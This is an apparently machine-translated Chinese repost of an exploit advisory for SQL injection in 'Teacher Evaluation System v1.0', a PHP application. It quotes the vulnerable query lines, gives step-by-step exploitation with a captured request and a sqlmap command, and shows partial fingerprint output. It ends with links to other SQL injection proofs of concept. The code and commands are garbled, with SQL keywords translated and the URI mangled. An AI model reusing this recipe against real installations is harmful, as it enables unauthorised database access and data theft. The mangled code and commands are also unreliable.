教师评估系统v1.0 -SQL注入

HackApt-37 Team · 04 9, 2025

＃利用标题:教师评估系统v1.0 -SQL注入
＃日期: 07/2023
＃利用作者: Andrey Stoykov
＃供应商homepage3360 https://www.sourcecodester.com/php/...ystem-using-phpmysqli-source-source-code.html
＃软件link: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/eval_2.zip
＃版本: 1.0
＃在: Windows Server 2022上测试
SQLI＃1
file: edit_evaluation
第4行
$ qry=$ conn-Query（'select *从ratings where id='。$ _ get ['id']）-fetch_array（）;
[.]
SQLI＃2
file: view_faculty.php
第4行
//添加'iD'参数之后'view_faculty'参数，然后用整数添加等价'id'
[.]
$ qry=$ conn-Query（'select *，concat（firstName，''，lastName）为catulty_list的名称，其中id='。$ _ get ['id']） - fetch_array（）;
[.]
利用:的步骤
1。登录到申请
2。浏览到以下URI'http://-HOST/eval/index.php？page=view_facultyid=1'
3。复制请求以拦截代理到文件
4。使用SQLMAP利用
sqlmap -r test.txt -threads 1 -dbms=mysql -fingerprint
[.]
[INFO]测试MySQL
[info]确认mysql
[INFO]后端DBMS是MySQL
[info]主动指纹mysql
[INFO]执行MySQL注释注射指纹
后端DBMS:活动指纹: mysql=5.7
注释Interprint: MySQL 5.6.49
叉指纹: Mariadb
[.]

	POC Joomla 3.7.0 SQL注入(CVE-2017-8917) Shacker 09 13, 2024 POC/?Day
	兰陵OA EKP 后台SQL注入漏洞 CNVD-2021-01363 Shacker 09 10, 2024 POC/?Day
H	SCRMS 2023-05-27 1.0-多个SQL注入 HackApt-37 Team 04 9, 2025 POC/?Day
H	MotoCMS版本3.4.3 -SQL注入 HackApt-37 Team 04 9, 2025 POC/?Day
H	Groomify V1.0 -SQL注入 HackApt-37 Team 04 9, 2025 POC/?Day